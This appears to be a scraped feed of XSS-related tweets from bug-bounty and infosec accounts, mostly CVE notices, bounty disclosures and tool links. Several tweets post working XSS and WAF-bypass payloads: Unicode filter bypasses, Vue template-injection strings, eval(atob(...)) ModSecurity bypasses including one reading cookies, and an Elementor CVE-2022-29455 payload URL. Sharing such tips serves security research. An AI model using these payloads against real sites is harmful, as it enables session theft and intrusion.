![profile](https://pbs.twimg.com/profile_images/1420213645900881924/rm9-MCbG_normal.png)
Hot10Security
@Hot10Security2 years agoPopular keywords used with #vulnerability tweets Date: 2023-01-19 Unique Tweets: 410 TOP 10 KEYWORDS 1: Azure 2: MainWP 3: Extension 4: Cross 5: Site 6: Scripting 7: CVE 8: XSS 9: RCE 10: Vigil bot-tweet #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Disclosed2 years ago⚡ Cookie exfiltration through XSS on the main search request of https://t.co/YmCo3V0SPU 👨💻 voiddy ➟ LocalTapiola 🟧 Medium 💰 $500.0 https://t.co/m3XCQvXP8c #bugbounty #bugbountytips #cybersecurity https://t.co/UQQvWqojN7
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_2 years agoVulnerability Spotlight: XSS vulnerability in Ghost CMS #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1543963505048551428/2zOk38wP_normal.jpg)
ӉѦСҠіИԌ ҬЄѦӍ ԌГԱթѺ ѺҒіСіѦL
@HackingTeam12 years agoXSS/WAF/SQL filter bypass. < - %EF%BC%9C (\uff1c) > - %EF%BC%9E (\uff1e) \ - %EF%BC%BC (\uff3c) / - %EF%BC%8F (\uff0f) ' - %EF%BC%87 (\uff07) " - %EF%BC%82 (\uff02) #bypass #xss #waf #sql 💻Comunidad de Ciberseguridad y Hacking 💻
![profile](https://pbs.twimg.com/profile_images/1601664448925556736/xFqeWsSg_normal.jpg)
Mike Takahashi
@TakSec2 years agoXSSHunter Discord Notifications by @AdamJSturge https://t.co/MmDY3oOLmk #bugbountytips #bugbounty #infosec #hacking #xss
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks2 years ago(CVE-2023-0323): Cross-site Scripting (XSS) - Stored in pimcore/pimcore. https://t.co/tSa4CJILd7 Disclosed by https://t.co/6dCOfMLYmV, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/914907986568638466/j6ZJi9cC_normal.jpg)
LinuxSecurity
@lnxsec2 years agoWant to scan for XSS vulns in websites/web apps?🔓 Then look no further than Pwn XSS, a powerful tool used by malicious hackers & security professionals alike. Learn how to install & run Pwn XSS👇👇 https://t.co/Lf8DN6BK3G Given it a try? What you think?🤔 #linux #infosec https://t.co/Z76TgsA2MW
![profile](https://pbs.twimg.com/profile_images/1610577090625273856/SRCw6oSh_normal.jpg)
Nithin 🦹♂️
@thebinarybot2 years agoName a concept in bug bounty you want me to write a detailed article on. Expecting something like IDOR, BAC etc. PS: Anything except XSS please 🙈 #bugbounty
![profile](https://pbs.twimg.com/profile_images/1604749570675810307/oI5mldCt_normal.jpg)
Mahmoud Abd Alkarim
@Maakthon2 years ago#htmlspecialchars() function in PHP only encode ASCII characters. #XSS #bypass #bugbountytips #BugBounty #html #php #javascript #hacking https://t.co/NreVNzG99x
![profile](https://pbs.twimg.com/profile_images/1604507985690009602/mHjZ5TMJ_normal.jpg)
Adam J Sturge
@AdamJSturge2 years agoI added Discord to XSSHunter and wrote an article about how to set it up https://t.co/nzTPPJB6Wh #infosecurity #infosec #bugbountytips #Pentesting #Security #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1582056005055090688/HqkAmXuB_normal.jpg)
NetFiT.eth
@OnNetFiT2 years agoAn xss payload for a VueJS based application: {{_Vue.h.constructor`alert(1)`()}} {{$emit.constructor`alert(1)`()}} #BugBounty #bugbountytips #infosec #CyberSec
![profile](https://pbs.twimg.com/profile_images/1420213645900881924/rm9-MCbG_normal.png)
Hot10Security
@Hot10Security2 years agoPopular keywords used with #vulnerability tweets Date: 2023-01-18 Unique Tweets: 348 TOP 10 KEYWORDS 1: CVE 2: Scripting 3: XSS 4: Attacks 5: Git 6: Vulnerabilities 7: Injection 8: Data 9: Vulnerability 10: Cloud bot-tweet #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks2 years ago(CVE-2023-0314): Cross-site Scripting (XSS) - Reflected in thorsten/phpmyfaq. https://t.co/lT0gndGcBK Disclosed by @aggressiveusers, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks2 years ago(CVE-2023-0313): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/rlmWPGlbZt Disclosed by https://t.co/jYCFhLpreW, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks2 years ago(CVE-2023-0312): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/JgA0kkLtS5 Disclosed by https://t.co/CO1HKk5eFz, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks2 years ago(CVE-2023-0310): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/49QPeEgxfW Disclosed by https://t.co/CO1HKk5eFz, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks2 years ago(CVE-2023-0309): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/SiIrXmJ8dT Disclosed by https://t.co/CO1HKk5eFz, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks2 years ago(CVE-2023-0308): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/fTIKyrhLuE Disclosed by https://t.co/CO1HKk5eFz, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks2 years ago(CVE-2023-0306): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/sbYdhQdGdo Disclosed by https://t.co/IJVlWK9pbV, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1371589267252776962/8_4YSfPn_normal.jpg)
Alonso Caballero
@Alonso_ReYDeS2 years agoDisponible el video del Webinar Gratuito: "Cross-Site Scripting (XSS)". #cybersecurity #hacking #readteam #bugbounty #forensics #osint 🎯 https://t.co/QU6ghIwHeR https://t.co/bjJyidjuRb
![profile](https://pbs.twimg.com/profile_images/1399730689097015304/8mHPiNyi_normal.jpg)
Gokul A.P
@CodingGokul2 years agoHey Guys, I have been rewarded with a P2 reward ! [+] Severity : P2 [+] Bug : XSS in Jira [+] Bounty : $400 Try to check for all the Old CVEs when You find Jira instance ! #bugbounty #pentesting #webpentesting #cybersecurity #hackerone #bugbountytips https://t.co/5aRznpSw24
![profile](https://pbs.twimg.com/profile_images/1607061228819566593/ZuWM23vz_normal.jpg)
Nik H
@Nikahverse2 years agoXSS mindmap =) https://t.co/EUrRhy0WYI #xss #mindmap #bugbounty #bugbountytips #cybersecuritytips #CyberSec https://t.co/sz6pZcb4fx
![profile](https://pbs.twimg.com/profile_images/1356492237220294657/yOpun9t3_normal.jpg)
CYBER4ALL
@cyber_4all2 years agoCybersecurity Attack Vectors #cyberattacks #cybersecurity #dataprivacy #infosec #malware #blueteam #Soc #phishing #xss #mitm #ransomware #SQLinjection #malicious_insiders #forensic #incidentresponse #cyber4all #c4a #ethicalhacking #learning4all https://t.co/G2c7znMeZh
![profile](https://pbs.twimg.com/profile_images/1554826316695814144/Qp97e98R_normal.jpg)
Anonymous H4ck3r
@AnonymousH4ck352 years agoSome ModSecurity WAF bypass xss payload list:👇 🔥👇 #infosec #AppSec <svg/onload=eval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ==’))> <svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))> <svg onload='new Function`[“_Y000!_”].find(al\u0065rt)`'>
![profile](https://pbs.twimg.com/profile_images/1601541091635101696/UK-n3GXU_normal.jpg)
Willie Birch
@btcwin_2 years agoXSS "403 forbidden" bypass write up #Cybersecurity #infosec #security via https://t.co/CCtqTjT3f6 https://t.co/97MmlOSANg
![profile](https://pbs.twimg.com/profile_images/1569303471001575426/ENwsPzVm_normal.jpg)
RedTeam Pentesting
@RedTeamPT2 years ago🚨🚨🚨 A critical vulnerability in Skyhigh Security's Secure Web Gateway has been fixed 🔥 https://t.co/DIP5rmu4js Make sure to update 🩹 Details will follow soon! #patchday #infosec #xss
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Disclosed2 years ago⚡ DOM XSS at `https://t.co/toWqmx06j8{site}` due to outdated Swagger UI 👨💻 @i_eh_dreamer ➟ Adobe 🟧 Medium 💰 N/A https://t.co/ctyHLhYG5f #bugbounty #bugbountytips #cybersecurity https://t.co/vzC4LaTIpT
![profile](https://pbs.twimg.com/profile_images/1242982896211652609/JHYwg95l_normal.jpg)
spyx
@spyx_myky2 years agoWordpress Elementor DOM XSS still up there. CVE-2022-29455. Payload for "xss" pop up: https://site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg= #bugbountytip #bugbountytips https://t.co/fBbChseq0v
![profile](https://pbs.twimg.com/profile_images/1603354063772733440/FdOB51BT_normal.jpg)
Decode Decrypt
@DecodeDecrypt2 years agoXSS "403 forbidden" bypass write up #Cybersecurity #infosec #security via https://t.co/a2QDS692i1 https://t.co/KDYA1dyOW9
![profile](https://pbs.twimg.com/profile_images/1607002355244875776/mkEg80g5_normal.jpg)
Banking and Fintech News
@StanleyEpstein2 years agoXSS "403 forbidden" bypass write up #Cybersecurity #infosec #security via https://t.co/eBW8Lmmpx7 https://t.co/TT7vD44Y9r